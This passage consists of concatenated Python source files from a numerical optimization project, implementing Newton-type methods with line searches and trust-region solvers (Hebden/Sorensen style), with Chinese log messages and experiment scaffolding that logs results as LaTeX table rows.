        # logger.info("非精确牛顿法 & 选择2 & {} & {} & {} & {} & 是 \\\\".format(round(func_X_star, 5), iter_num, function_num, round(cpu_time, 2)))
        # ILS_INBM_hyper_parameters["INBM"]["eta_mode"] = 1
        # logger.info("非精确线搜索下的INBM法")
        # X_star, func_X_star, iter_num, function_num, cpu_time = INBM(x0, penalty1.func, penalty1.gfunc, penalty1.hess_func, hyper_parameters=ILS_INBM_hyper_parameters)
        # logger.info("非精确牛顿回溯法 & 选择1 & {} & {} & {} & {} & 是 \\\\".format(round(func_X_star, 5), iter_num, function_num, round(cpu_time, 2)))
        # ILS_INBM_hyper_parameters["INBM"]["eta_mode"] = 2
        # logger.info("非精确线搜索下的INBM法")
        # X_star, func_X_star, iter_num, function_num, cpu_time = INBM(x0, penalty1.func, penalty1.gfunc, penalty1.hess_func, hyper_parameters=ILS_INBM_hyper_parameters)
        # logger.info("非精确牛顿回溯法 & 选择2 & {} & {} & {} & {} & 是 \\\\".format(round(func_X_star, 5), iter_num, function_num, round(cpu_time, 2)))
        # Active experiment: INBM with eta choice 2 on Extended Freudenstein-Roth;
        # results are logged as LaTeX table rows.
        logger.info("Extended_Freudenstein_Roth 函数")
        x0 = np.array([-2.] * n)
        EFR = functions.Extended_Freudenstein_Roth(n)
        # ILS_INM_hyper_parameters["INM"]["eta_mode"] = 1
        # logger.info("选择1下的INM法")
        # X_star, func_X_star, iter_num, function_num, cpu_time = inexact_newton_method(x0, EFR.func, EFR.gfunc, EFR.hess_func, hyper_parameters=ILS_INM_hyper_parameters)
        # logger.info("非精确牛顿法 & 选择1 & {} & {} & {} & {} & 是 \\\\".format(format(func_X_star, ".4e"), iter_num, function_num, round(cpu_time, 2)))
        # ILS_INM_hyper_parameters["INM"]["eta_mode"] = 2
        # logger.info("选择2下的INM法")
        # X_star, func_X_star, iter_num, function_num, cpu_time = inexact_newton_method(x0, EFR.func, EFR.gfunc, EFR.hess_func, hyper_parameters=ILS_INM_hyper_parameters)
        # logger.info("非精确牛顿法 & 选择2 & {} & {} & {} & {} & 是 \\\\".format(format(func_X_star, ".4e"), iter_num, function_num, round(cpu_time, 2)))
        # ILS_INBM_hyper_parameters["INBM"]["eta_mode"] = 1
        # logger.info("选择1下的INBM法")
        # X_star, func_X_star, iter_num, function_num, cpu_time = INBM(x0, EFR.func, EFR.gfunc, EFR.hess_func, hyper_parameters=ILS_INBM_hyper_parameters)
        # logger.info("非精确牛顿回溯法 & 选择1 & {} & {} & {} & {} & 是 \\\\".format(format(func_X_star, ".4e"), iter_num, function_num, round(cpu_time, 2)))
        ILS_INBM_hyper_parameters["INBM"]["eta_mode"] = 2
        logger.info("选择2下的INBM法")
        X_star, func_X_star, iter_num, function_num, cpu_time = INBM(x0, EFR.func, EFR.gfunc, EFR.hess_func, hyper_parameters=ILS_INBM_hyper_parameters)
        logger.info("非精确牛顿回溯法 & 选择2 & {} & {} & {} & {} & 是 \\\\".format(format(func_X_star, ".4e"), iter_num, function_num, round(cpu_time, 2)))
        # logger.info("GLL线搜索下的INBM法")
        # X_star, func_X_star, iter_num, function_num, cpu_time = INBM(x0, EFR.func, EFR.gfunc, EFR.hess_func, hyper_parameters=GLL_INBM_hyper_parameters)
        # logger.info("Extended_Rosenbrock 函数")
        # ER = functions.Extended_Rosenbrock(n)
        # x0 = np.zeros(n)
        # t = np.array(range(int(n / 2)))
        # x0[2 * t] = -1.2
        # x0[2 * t + 1] = 1
        # ILS_INM_hyper_parameters["INM"]["eta_mode"] = 1
        # logger.info("选择1下的INM法")
        # X_star, func_X_star, iter_num, function_num, cpu_time = inexact_newton_method(x0, ER.func, ER.gfunc, ER.hess_func, hyper_parameters=ILS_INM_hyper_parameters)
        # logger.info("非精确牛顿法 & 选择1 & {} & {} & {} & {} & 是 \\\\".format(format(func_X_star, ".4e"), iter_num, function_num, round(cpu_time, 2)))
        # ILS_INM_hyper_parameters["INM"]["eta_mode"] = 2
        # logger.info("选择2下的INM法")
        # X_star, func_X_star, iter_num, function_num, cpu_time = inexact_newton_method(x0, ER.func, ER.gfunc, ER.hess_func, hyper_parameters=ILS_INM_hyper_parameters)
        # logger.info("非精确牛顿法 & 选择2 & {} & {} & {} & {} & 是 \\\\".format(format(func_X_star, ".4e"), iter_num, function_num, round(cpu_time, 2)))
        # ILS_INBM_hyper_parameters["INBM"]["eta_mode"] = 1
        # logger.info("选择1下的INBM法")
        # X_star, func_X_star, iter_num, function_num, cpu_time = INBM(x0, ER.func, ER.gfunc, ER.hess_func, hyper_parameters=ILS_INBM_hyper_parameters)
        # logger.info("非精确牛顿回溯法 & 选择1 & {} & {} & {} & {} & 是 \\\\".format(format(func_X_star, ".4e"), iter_num, function_num, round(cpu_time, 2)))
        # ILS_INBM_hyper_parameters["INBM"]["eta_mode"] = 2
        # logger.info("选择2下的INBM法")
        # X_star, func_X_star, iter_num, function_num, cpu_time = INBM(x0, ER.func, ER.gfunc, ER.hess_func, hyper_parameters=ILS_INBM_hyper_parameters)
        # logger.info("非精确牛顿回溯法 & 选择2 & {} & {} & {} & {} & 是 \\\\".format(format(func_X_star, ".4e"), iter_num, function_num, round(cpu_time, 2)))
        # x0 = np.array([1/n] * int(n))
        # f_funciton = functions.trigonometric
        # g_function = functions.g_trigonometric
        # G_function = functions.G_trigonometric
        # logger.info("非精确线搜索下的INM法")
        # X_star, func_X_star, iter_num, function_num, cpu_time = inexact_newton_method(x0, f_funciton, g_function, G_function, hyper_parameters=ILS_INM_hyper_parameters)
        # logger.info("非精确牛顿法 & 选择2 & {} & {} & {} & {} & 是 \\\\".format(format(func_X_star, ".4e"), iter_num, function_num, round(cpu_time, 2)))
        # logger.info("GLL线搜索下的INBM法")
        # X_star, func_X_star, iter_num, function_num, cpu_time = inexact_newton_method(x0, f_funciton, g_function, G_function, hyper_parameters=GLL_INM_hyper_parameters)
        # logger.info("非精确牛顿法 & GLL & {} & {} & {} & {} & 是 \\\\".format(format(func_X_star, ".4e"), iter_num, function_num, round(cpu_time, 2)))
        # logger.info("精确线搜索下的INBM法")
        # X_star, func_X_star, iter_num, function_num, cpu_time = INBM(x0, f_funciton, g_function, G_function, hyper_parameters=ELS_INBM_hyper_parameters)
        # logger.info("非精确牛顿回溯法 & ELS & {} & {} & {} & {} & 是 \\\\".format(format(func_X_star, ".4e"), iter_num, function_num, round(cpu_time, 2)))
        # logger.info("非精确线搜索下的INBM法")
        # X_star, func_X_star, iter_num, function_num, cpu_time = INBM(x0, f_funciton, g_function, G_function, hyper_parameters=ILS_INBM_hyper_parameters)
        # logger.info("非精确牛顿回溯法 & 选择1 & {} & {} & {} & {} & 是 \\\\".format(format(func_X_star, ".4e"), iter_num, function_num, round(cpu_time, 2)))
        # logger.info("GLL线搜索下的INBM法")
        # X_star, func_X_star, iter_num, function_num, cpu_time = INBM(x0, f_funciton, g_function, G_function, hyper_parameters=GLL_INBM_hyper_parameters)
        # logger.info("非精确牛顿回溯法 & GLL & {} & {} & {} & {} & 是 \\\\".format(format(func_X_star, ".4e"), iter_num, function_num, round(cpu_time, 2)))
--- FILE SEPARATOR ---
import functions
import numpy as np
from goto import with_goto
import Line_Search.exact_line_search as ELS
import Line_Search.inexact_line_search as ILS
from Line_Search.GLL import GLL_search
import utils
import functools
import copy
import logging
logging.basicConfig(format='%(asctime)s,%(msecs)d %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',
datefmt='%d-%m-%Y:%H:%M:%S')
logging.getLogger().setLevel(logging.DEBUG)
logger = logging.getLogger(__name__)
@with_goto
def basic_newton(X, func, gfunc, hess_func, hyper_parameters=None, search_mode="ELS", use_modified_Cholesky=True, epsilon=1e-5, max_epoch=1000):
    """Minimize ``func`` with the basic Newton method (unit step).

    Each iteration takes X_{k+1} = X_k + d with d = -G_k^{-1} g_k; no line
    search is performed.

    Args:
        X (np.array): starting point.
        func (callable): objective function.
        gfunc (callable): gradient of the objective.
        hess_func (callable): Hessian of the objective.
        hyper_parameters (dict, optional): when given, overrides the keyword
            defaults below ("search_mode", "epsilon", "max_epoch",
            "damp_newton"/"use_modified_Cholesky", "modified_Cholesky").
        search_mode (str): kept for a uniform interface; unused here since no
            line search is performed.
        use_modified_Cholesky (bool): whether to use the modified Cholesky
            factorization to build the (positive definite) system matrix.
        epsilon (float): stop when the function decrease is below epsilon.
        max_epoch (int): maximum number of iterations.

    Returns:
        tuple: (X*, f(X*), iteration count, function-evaluation count).

    Raises:
        Exception: if max_epoch iterations are exceeded.
    """
    if hyper_parameters is not None:
        search_mode = hyper_parameters["search_mode"]
        epsilon = hyper_parameters["epsilon"]
        max_epoch = hyper_parameters["max_epoch"]
        # NOTE(review): reads the "damp_newton" config section — presumably shared
        # with damp_newton; confirm this key is intended for basic_newton too.
        use_modified_Cholesky = hyper_parameters["damp_newton"]["use_modified_Cholesky"]
    k = 1
    function_k = 0  # number of function evaluations
    func_values = []  # function value of every step (used by the GLL search)
    mk = 0  # initial mk for GLL
    # compute the descent direction d_k
    label .count_dk
    G = hess_func(X)
    g = gfunc(X)
    # record the current function value
    F = func(X)
    function_k += 1
    func_values.append(F)
    try:
        if use_modified_Cholesky:
            L, D = utils.modified_Cholesky(G, hyper_parameters["modified_Cholesky"])
            G_ = utils.get_modified_G(L, D)
            inv_hass = np.linalg.inv(G_)
            d = -np.dot(inv_hass , g)
        else:
            inv_hass = np.linalg.inv(G)
            d = -np.dot(inv_hass , g)
    # BUGFIX: was a bare `except:` which also swallowed KeyboardInterrupt and
    # unrelated bugs; only a singular Hessian should trigger the fallback.
    except np.linalg.LinAlgError:
        logger.info("Hessian 矩阵不可逆,用修正Cholesky分解求下降方向")
        L, D = utils.modified_Cholesky(G, hyper_parameters["modified_Cholesky"])
        G_ = utils.get_modified_G(L, D)
        inv_hass = np.linalg.inv(G_)
        d = -np.dot(inv_hass , g)
    # the basic Newton method needs no step length (unit step)
    X_new = X + d
    function_k = function_k + 1
    func_X_new = func(X_new)
    if abs(func_X_new - F) <= epsilon:
        logger.info("因为函数值下降在{epsilon}以内,基本牛顿法,迭代结束,迭代轮次{iter},函数调用次数{func_k},最终X={X},最终函数值={func_X_new}".format(epsilon=epsilon, iter=k, func_k=function_k, X=X,func_X_new=func_X_new))
        return X_new, func_X_new, k, function_k
    if k > max_epoch:
        # BUGFIX: the %-format was never applied (args were passed as a tuple)
        raise Exception("超过最大迭代次数:%d" % max_epoch)
    X = X_new
    k += 1
    goto .count_dk
@with_goto
def damp_newton(X, func, gfunc, hess_func, hyper_parameters=None, search_mode="ELS", use_modified_Cholesky=True, epsilon=1e-5, max_epoch=1000):
    """Minimize ``func`` with the damped Newton method.

    Each iteration computes d = -G_k^{-1} g_k and then chooses the step
    length with the selected line search.

    Args:
        X (np.array): starting point.
        func (callable): objective function.
        gfunc (callable): gradient of the objective.
        hess_func (callable): Hessian of the objective.
        hyper_parameters (dict, optional): when given, overrides the keyword
            defaults below ("search_mode", "epsilon", "max_epoch",
            "damp_newton"/"use_modified_Cholesky", plus the section for the
            chosen line search).
        search_mode (str): line-search mode, one of ['ELS', 'ILS', 'GLL'].
        use_modified_Cholesky (bool): whether to use the modified Cholesky
            factorization to build the (positive definite) system matrix.
        epsilon (float): stop when the function decrease is below epsilon.
        max_epoch (int): maximum number of iterations.

    Returns:
        tuple: (X*, f(X*), iteration count, function-evaluation count).

    Raises:
        ValueError: if search_mode is not one of the supported modes.
    """
    if hyper_parameters is not None:
        search_mode = hyper_parameters["search_mode"]
        epsilon = hyper_parameters["epsilon"]
        max_epoch = hyper_parameters["max_epoch"]
        use_modified_Cholesky = hyper_parameters["damp_newton"]["use_modified_Cholesky"]
    k = 1
    function_k = 0  # number of function evaluations
    func_values = []  # function value of every step (used by the GLL search)
    mk = 0  # initial mk for GLL
    # compute the descent direction d_k
    label .count_dk
    G = hess_func(X)
    g = gfunc(X)
    # record the current function value
    F = func(X)
    function_k += 1
    func_values.append(F)
    try:
        if use_modified_Cholesky:
            L, D = utils.modified_Cholesky(G, hyper_parameters["modified_Cholesky"])
            G_ = utils.get_modified_G(L, D)
            inv_hass = np.linalg.inv(G_)
            d = -np.dot(inv_hass , g)
        else:
            inv_hass = np.linalg.inv(G)
            d = -np.dot(inv_hass , g)
    # BUGFIX: was a bare `except:` which also swallowed KeyboardInterrupt and
    # unrelated bugs; only a singular Hessian should trigger the fallback.
    except np.linalg.LinAlgError:
        logger.info("Hessian 矩阵不可逆,用修正Cholesky分解求下降方向")
        L, D = utils.modified_Cholesky(G, hyper_parameters["modified_Cholesky"])
        G_ = utils.get_modified_G(L, D)
        inv_hass = np.linalg.inv(G_)
        d = -np.dot(inv_hass , g)
    # compute the step length with the chosen line search
    if search_mode == "ELS":
        logger.info("迭代第{iter}轮,当前函数调用次数{func_k},当前X取值为{X},下降方向为{d},当前函数值为{func_x}".format(iter=k,func_k=function_k,X=X,d=d,func_x=round(F, 8)))
        a, b, add_retreat_func = ELS.retreat_method(func, X, d, hyper_parameters=hyper_parameters["ELS"]["retreat_method"] if hyper_parameters is not None else None)
        alpha_star, add_golden_func = ELS.golden_method(func, X, d, a, b, hyper_parameters=hyper_parameters["ELS"]["golden_method"] if hyper_parameters is not None else None)
        add_func_k = add_retreat_func + add_golden_func
    elif search_mode == "ILS":
        logger.info("迭代第{iter}轮,当前函数调用次数{func_k},当前X取值为{X},下降方向为{d},当前函数值为{func_x}".format(iter=k,func_k=function_k,X=X,d=d,func_x=round(F, 8)))
        alpha_star, add_func_k = ILS.inexact_line_search(func, gfunc, X, d, hyper_parameters=hyper_parameters["ILS"] if hyper_parameters is not None else None)
    elif search_mode == "GLL":
        logger.info("迭代第{iter}轮,当前函数调用次数{func_k},当前X取值为{X},下降方向为{d},当前函数值为{func_x}".format(iter=k,func_k=function_k,X=X,d=d,func_x=round(F, 8)))
        alpha_star, add_func_k, mk = GLL_search(func, gfunc, X, d, func_values, mk, hyper_parameters=hyper_parameters["GLL"] if hyper_parameters is not None else None)
    else:
        # BUGFIX: the message omitted 'GLL', which is accepted above
        raise ValueError("参数search_mode 必须从['ELS', 'ILS', 'GLL']当中选择")
    X_new = X + d * alpha_star
    function_k = function_k + add_func_k + 1
    func_X_new = func(X_new)
    if abs(func_X_new - F) <= epsilon:
        logger.info("因为函数值下降在{epsilon}以内,{mode}的阻尼牛顿法,迭代结束,迭代轮次{iter},函数调用次数{func_k},最终X={X},最终函数值={func_X_new}".format(epsilon=epsilon, mode=search_mode, iter=k, func_k=function_k, X=X,func_X_new=func_X_new))
        return X_new, func_X_new, k, function_k
    if k > max_epoch:
        logger.info("超过最大迭代次数:%d", max_epoch)
        return X_new, func_X_new, k, function_k
    X = X_new
    k += 1
    goto .count_dk
def negative_curvature(LT, D, E):
    """Compute a direction of negative curvature, if one exists.

    Args:
        LT (np.array): the transposed L factor of the modified Cholesky
            factorization.
        D (np.array): diagonal matrix D of the factorization.
        E (np.array): diagonal correction matrix, obtained as modified_G - G.

    Returns:
        np.array or None: a negative-curvature direction, or None when
        every psi_i = D_ii - E_ii at the minimum is non-negative.
    """
    dim = len(D)
    # Step 1: psi_i = D_ii - E_ii for every diagonal entry
    psi = np.zeros(dim)
    for idx in range(dim):
        psi[idx] = D[idx][idx] - E[idx][idx]
    # Step 2: indices where psi attains its minimum
    min_idx = np.where(psi == np.min(psi))[0]
    # Step 3: no negative curvature when the minimal psi is non-negative
    if np.all(psi[min_idx] >= 0):
        return None
    # Otherwise build the indicator vector and map it through inv(LT)
    indicator = np.zeros(dim)
    indicator[min_idx] = 1
    return np.dot(indicator, np.linalg.inv(LT))
@with_goto
def GM_newton(X, func, gfunc, hess_func, hyper_parameters=None, zeta=1e-2, search_mode="ELS", epsilon=1e-5, max_epoch=1000):
    """Minimize ``func`` with the Gill-Murray stabilized Newton method.

    Uses the modified Cholesky factorization of the Hessian; when the
    gradient is small, falls back to a negative-curvature direction.

    Args:
        X (np.array): starting point.
        func (callable): objective function.
        gfunc (callable): gradient of the objective.
        hess_func (callable): Hessian of the objective.
        hyper_parameters (dict, optional): when given, overrides the keyword
            defaults below ("GM_newton"/"zeta", "search_mode", "epsilon",
            "max_epoch", plus the section for the chosen line search).
        zeta (float): when ||g|| > zeta, solve the modified Newton system for
            the descent direction; otherwise try a negative-curvature direction.
        search_mode (str): line-search mode, one of ['ELS', 'ILS', 'GLL'].
        epsilon (float): stop when the function decrease is below epsilon.
        max_epoch (int): maximum number of iterations.

    Returns:
        tuple: (X*, f(X*), iteration count, function-evaluation count).

    Raises:
        ValueError: if search_mode is not one of the supported modes.
    """
    if hyper_parameters is not None:
        zeta = hyper_parameters["GM_newton"]["zeta"]
        search_mode = hyper_parameters["search_mode"]
        epsilon = hyper_parameters["epsilon"]
        max_epoch = hyper_parameters["max_epoch"]
    function_k = 0
    k = 1
    func_values = []  # function value of every step (used by the GLL search)
    mk = 0  # initial mk for GLL
    assert epsilon > 0 , "must have epsilon > 0"
    # step 2: compute g and G
    label .step2
    g = gfunc(X)
    G = hess_func(X)
    # record the current function value
    function_k += 1
    F = func(X)
    func_values.append(F)
    # step 3: modified Cholesky factorization of G
    # NOTE(review): called without hyper_parameters here, unlike the other
    # call sites — presumably utils.modified_Cholesky has defaults; confirm.
    L, D = utils.modified_Cholesky(G)
    modified_G = utils.get_modified_G(L, D)
    # step 4: when ||g(x)|| > zeta, solve the system for the descent direction
    if np.linalg.norm(g) > zeta:
        G_1 = np.linalg.inv(modified_G)
        d = -np.dot(G_1, g)
        goto.step6
    # step 5: compute a negative-curvature direction; stop if none exists
    LT = copy.deepcopy(L).T
    E = modified_G - G
    d = negative_curvature(LT, D, E)
    # BUGFIX: was `d == None`, which is elementwise (and ambiguous) for numpy arrays
    if d is None:
        # BUGFIX: the log previously referenced func_X_new, which is undefined
        # on the first iteration; report the current function value F instead
        logger.info("因为负曲率方向不存在,{mode}的GM稳定牛顿法,迭代结束,迭代轮次{iter},函数调用次数{func_k},最终X={X},最终函数值={func_X_new}".format(mode=search_mode,iter=k, func_k=function_k,X=X,func_X_new=F))
        return X, F, k, function_k
    else:
        # BUGFIX: was np.dot(np.mat(g).T, d), whose shapes (n,1) x (n,) do not
        # conform for n > 1; flip d so it is a descent direction (g^T d < 0)
        if np.dot(g, d) > 0:
            d = -d
    # step 6: line search for the step length
    label .step6
    if search_mode == "ELS":
        logger.info("迭代第{iter}轮,当前函数调用次数{func_k},当前X取值为{X},下降方向为{d},当前函数值为{func_x}".format(iter=k,func_k=function_k,X=X,d=d,func_x=round(F, 8)))
        a, b, add_retreat_func = ELS.retreat_method(func, X, d, hyper_parameters=hyper_parameters["ELS"]["retreat_method"] if hyper_parameters is not None else None)
        alpha_star, add_golden_func = ELS.golden_method(func, X, d, a, b, hyper_parameters=hyper_parameters["ELS"]["golden_method"] if hyper_parameters is not None else None)
        add_func_k = add_retreat_func + add_golden_func
    elif search_mode == "ILS":
        logger.info("迭代第{iter}轮,当前函数调用次数{func_k},当前X取值为{X},下降方向为{d},当前函数值为{func_x}".format(iter=k,func_k=function_k,X=X,d=d,func_x=round(F, 8)))
        alpha_star, add_func_k = ILS.inexact_line_search(func, gfunc, X, d, hyper_parameters=hyper_parameters["ILS"] if hyper_parameters is not None else None)
    elif search_mode == "GLL":
        logger.info("迭代第{iter}轮,当前函数调用次数{func_k},当前X取值为{X},下降方向为{d},当前函数值为{func_x}".format(iter=k,func_k=function_k,X=X,d=d,func_x=round(F, 8)))
        alpha_star, add_func_k, mk = GLL_search(func, gfunc, X, d, func_values, mk, hyper_parameters=hyper_parameters["GLL"] if hyper_parameters is not None else None)
    else:
        # BUGFIX: the message omitted 'GLL', which is accepted above
        raise ValueError("参数search_mode 必须从['ELS', 'ILS', 'GLL']当中选择")
    X_new = X + d * alpha_star
    function_k = function_k + add_func_k + 1
    func_X_new = func(X_new)
    if abs(func_X_new - F) <= epsilon:
        logger.info("因为函数值下降在{epsilon}以内,{mode}的GM稳定牛顿法,迭代结束,迭代轮次{iter},函数调用次数{func_k},最终X={X},最终函数值={func_X_new}".format(mode=search_mode,epsilon=epsilon, iter=k, func_k=function_k, X=X,func_X_new=func_X_new))
        return X_new, func_X_new, k, function_k
    if k > max_epoch:
        logger.info("超过最大迭代次数:%d", max_epoch)
        return X_new, func_X_new, k, function_k
    X = X_new
    k += 1
    goto .step2
if __name__ == '__main__':
    # Smoke test on the Wood function with symbolic gradient/Hessian helpers
    x0 = np.array([-3, -1, -3, -1])
    d0 = np.array([2, 1, 2, 1])
    diff_wood_list, symbols_wood_list = functions.diff_wood_expression()
    g_wood_partial = functools.partial(functions.g_wood, diff_list=diff_wood_list, symbols_list=symbols_wood_list)
    hess_wood_lists, symbols_wood_list = functions.hess_wood_expression()
    G_wood_partial = functools.partial(functions.G_wood, G_lists=hess_wood_lists, symbols_list=symbols_wood_list)
    # logger.info("精确线搜索下的阻尼牛顿法")
    # X_star, func_X_star, iter_num, function_num = damp_newton(x0, functions.wood, g_wood_partial, G_wood_partial, search_mode='ELS')
    # logger.info("非精确线搜索下的阻尼牛顿法")
    # X_star, func_X_star, iter_num, function_num = damp_newton(x0, functions.wood, g_wood_partial, G_wood_partial, search_mode='ILS')
    logger.info("GLL线搜索下的阻尼牛顿法")
    # BUGFIX: damp_newton returns 4 values (X, f(X), iterations, function
    # evaluations); the previous 3-target unpacking raised ValueError.
    X_star, func_X_star, iter_num, function_num = damp_newton(x0, functions.wood, g_wood_partial, G_wood_partial, search_mode='GLL')
    # logger.info("精确线搜索下的GM稳定牛顿法")
    # X_star, func_X_star, iter_num, function_num = GM_newton(x0, functions.wood, g_wood_partial, G_wood_partial, search_mode='ELS')
    # logger.info("非精确线搜索下的GM稳定牛顿法")
    # X_star, func_X_star, iter_num, function_num = GM_newton(x0, functions.wood, g_wood_partial, G_wood_partial, search_mode='ILS')
    # logger.info("GLL线搜索下的GM稳定牛顿法")
    # X_star, func_X_star, iter_num, function_num = GM_newton(x0, functions.wood, g_wood_partial, G_wood_partial, search_mode='GLL')
--- FILE SEPARATOR ---
import functions
import numpy as np
import math
import copy
from goto import with_goto
from utils import is_pos_def
import logging
logging.basicConfig(format='%(asctime)s,%(msecs)d %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',
datefmt='%d-%m-%Y:%H:%M:%S')
logging.getLogger().setLevel(logging.DEBUG)
logger = logging.getLogger(__name__)
@with_goto
def sorensen(X, func, gfunc, hess_func, delta, hyper_parameters=None, v_0=1e-2, epsilon=1e-10, max_epoch=10000):
    """Solve the trust-region (TR) subproblem with Sorensen's method.

    Iterates on the shift v in (G + vI) d = -g until ||d|| matches the
    trust-region radius delta (or the Newton step already lies inside it).

    Args:
        X (np.array): current iterate of the outer TR loop.
        func (callable): objective function (unused here; kept for a uniform
            TR-subproblem interface).
        gfunc (callable): gradient of the objective.
        hess_func (callable): Hessian of the objective.
        delta (float): trust-region radius (constraint ||d|| <= delta).
        hyper_parameters (dict, optional): accepted for interface uniformity;
            not read in this function.
        v_0 (float, optional): initial value of the shift v. Defaults to 1e-2.
        epsilon (float, optional): tolerance for the |  ||d|| - delta | test
            (guards against floating-point comparison issues). Defaults to 1e-10.
        max_epoch (int, optional): maximum number of inner iterations.
            Defaults to 10000.

    Returns:
        tuple: (d, k) — the computed TR step and the number of iterations used.

    Raises:
        Exception: if max_epoch iterations are exceeded.
    """
    # initialization
    k = 1
    v_k = v_0
    I = np.identity(len(X))
    G_org = hess_func(X)
    G = copy.deepcopy(G_org)
    # first check whether G is positive definite
    if not is_pos_def(G):  # G not PD: pick v in (-lambda_n, -2*lambda_n) so that G + vI becomes PD
        values, _vector = np.linalg.eig(G)
        values = sorted(values)
        # lambda_n is the smallest (most negative) eigenvalue
        lambda_n = values[0]
        # v = random.uniform(-lambda_n, -2 * lambda_n)
        v_k = - 3 / 2 * lambda_n
        G = G + v_k * I
    # Biggest difference from Hebden's method: a Cholesky factorization is used
    # here — it avoids recomputing an inverse every step and its factors drive
    # the iterative v update below.
    L = np.linalg.cholesky(G)
    inv_L = np.linalg.inv(L)
    inv_G = inv_L.T @ inv_L
    g = gfunc(X)
    d_v = - inv_G @ g
    # if the unconstrained Newton step already lies inside the TR, return it
    if np.linalg.norm(d_v) < delta:
        return d_v, k
    label.step4
    # d_v = - inv_G @ g
    q_l = inv_L @ d_v
    abs_d_v = np.linalg.norm(d_v)
    # phi(v) = ||d(v)|| - delta; we seek its root
    phi_v = abs_d_v - delta
    # check the termination criterion
    if abs(phi_v) <= epsilon:
        return d_v, k
    if k > max_epoch:
        raise Exception("使用sorensen方法求解TR子问题时,超过最大迭代次数:%d", max_epoch)
    # update v_k (Newton-like step on phi using the Cholesky factors)
    abs_d_v = np.linalg.norm(d_v)
    abs_q_l = np.linalg.norm(q_l)
    v_k = v_k + ((abs_d_v/abs_q_l) ** 2) * (abs_d_v - delta) / delta
    # recompute (G + vI) and its factorization
    G = G_org + v_k * I
    L = np.linalg.cholesky(G)
    inv_L = np.linalg.inv(L)
    inv_G = inv_L.T @ inv_L
    d_v = - inv_G @ g
    k = k + 1
    goto.step4
--- FILE SEPARATOR ---
import functions
import numpy as np
import math
import time
from goto import with_goto
import utils
import functools
from scipy.sparse.linalg import gmres
from Trust_Region.hebden import hebden
from Trust_Region.sorensen import sorensen
from Trust_Region.two_subspace_min import two_subspace_min
import argparse
import logging
logging.basicConfig(format='%(asctime)s,%(msecs)d %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',
datefmt='%d-%m-%Y:%H:%M:%S')
logging.getLogger().setLevel(logging.DEBUG)
logger = logging.getLogger(__name__)
def trust_region_method(X, func, gfunc, hess_func, hyper_parameters=None, TR_method=hebden, delta=0.1, epsilon=1e-9, max_epoch=1000):
    """Trust-region outer loop with a pluggable subproblem solver.

    Args:
        X ([np.array]): starting point
        func (callable): objective function
        gfunc (callable): gradient of the objective
        hess_func (callable): Hessian of the objective
        hyper_parameters (dict, optional): when given, overrides TR_method,
            delta, epsilon and max_epoch from its "TR"/"epsilon"/"max_epoch" keys
        TR_method (callable): subproblem solver (hebden / sorensen /
            two_subspace_min)
        delta (float): initial trust-region radius
        epsilon (float): stop when |F(x_k) - F(x_k + d)| < epsilon
        max_epoch (int): maximum number of outer iterations
    Returns:
        (X*, F(X*), #iterations, #function evaluations, #subproblem iterations,
        elapsed wall-clock time)
    """
    if hyper_parameters is not None:
        TR_method = hyper_parameters["TR"]["TR_method"]
        delta = hyper_parameters["TR"]["delta"]
        epsilon = hyper_parameters["epsilon"]
        max_epoch = hyper_parameters["max_epoch"]
    k = 0
    TR_iter_k = 0
    function_k = 0
    start_time = time.time()
    while True:  # replaces the former goto/label step-2 loop
        function_k += 1
        F = func(X)
        g = gfunc(X)
        G = hess_func(X)
        d, add_iter_k = TR_method(X, func, gfunc, hess_func, delta)
        TR_iter_k += add_iter_k
        end_time = time.time()
        function_k += 1
        logger.info("迭代第{iter}轮,当前函数调用次数{func_k},求解TR子问题共迭代次数{TR_k},当前用时{time},当前X取值为{X},当前g的取值为{g}, 下降方向为{d},当前函数值为{func_x}".format(iter=k,func_k=function_k,TR_k=TR_iter_k, time=end_time-start_time,X=X, g=g, d=d,func_x=round(F, 8)))
        X_tmp = X + d
        F_tmp = func(X_tmp)
        # Converged: the objective decrease has stalled below epsilon.
        if abs(F - F_tmp) < epsilon:
            end_time = time.time()
            logger.info("因为满足终止条件,{mode}方法,迭代结束,迭代轮次{iter},函数调用次数{func_k},求解TR子问题共迭代次数{TR_k},最终用时{time},最终X={X},最终函数值={func}".format(mode=TR_method.__name__, iter=k, func_k=function_k,TR_k=TR_iter_k, time=end_time-start_time, X=X,func=F))
            return X, F, k, function_k, TR_iter_k, end_time-start_time
        # gamma_k: ratio of the actual decrease to the decrease predicted by
        # the quadratic model; it drives the radius update.
        q_k = -(g @ d + 0.5 * d @ G @ d)
        gamma_k = (F - F_tmp) / q_k
        if gamma_k >= 0.75 and abs(np.linalg.norm(d) - delta) <= epsilon:
            delta = delta * 2
        elif gamma_k <= 0.25:
            delta = delta / 4
        if gamma_k > 0:
            X = X_tmp
        k = k + 1
        # BUG FIX: max_epoch was accepted and documented but never enforced,
        # so a non-converging run would loop forever.
        if k >= max_epoch:
            end_time = time.time()
            F_final = F_tmp if gamma_k > 0 else F
            logger.info("超过最大迭代次数,{mode}方法,迭代结束,迭代轮次{iter},函数调用次数{func_k},求解TR子问题共迭代次数{TR_k},最终用时{time},最终X={X},最终函数值={func}".format(mode=TR_method.__name__, iter=k, func_k=function_k, TR_k=TR_iter_k, time=end_time-start_time, X=X, func=F_final))
            return X, F_final, k, function_k, TR_iter_k, end_time-start_time
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Optimization')
    parser.add_argument("--m", type=int, default=100, help="测试函数的维度")
    parser.add_argument("--delta", type=float, default=0.5, help="信赖域问题中delta的取值")
    parser.add_argument("--test_fucntion", choices=["Wood", "EPS", "Trig", "Penalty1", "EFR", "ER"], type=str, default="EPS", help="测试函数的维度")
    args = parser.parse_args()
    m = args.m
    delta = args.delta

    def make_TR_hyper_parameters(TR_method):
        """Build the shared hyper-parameter dict for one subproblem solver."""
        return {
            "TR": {
                "TR_method": TR_method,
                "delta": delta,
            },
            "epsilon": 1e-8,
            "max_epoch": 1000,
        }

    Hebden_hyper_parameters = make_TR_hyper_parameters(hebden)
    Sorensen_hyper_parameters = make_TR_hyper_parameters(sorensen)
    TSM_hyper_parameters = make_TR_hyper_parameters(two_subspace_min)

    # Each branch selects the starting point X, the objective/gradient/Hessian
    # callbacks and the output file name for one test problem.
    if args.test_fucntion == "EPS":
        X = np.array([3, -1, 0, 1] * int(m // 4))
        test_function = functions.EPS(m)
        f_function = test_function.func
        g_function = test_function.gfunc
        G_function = test_function.hess_func
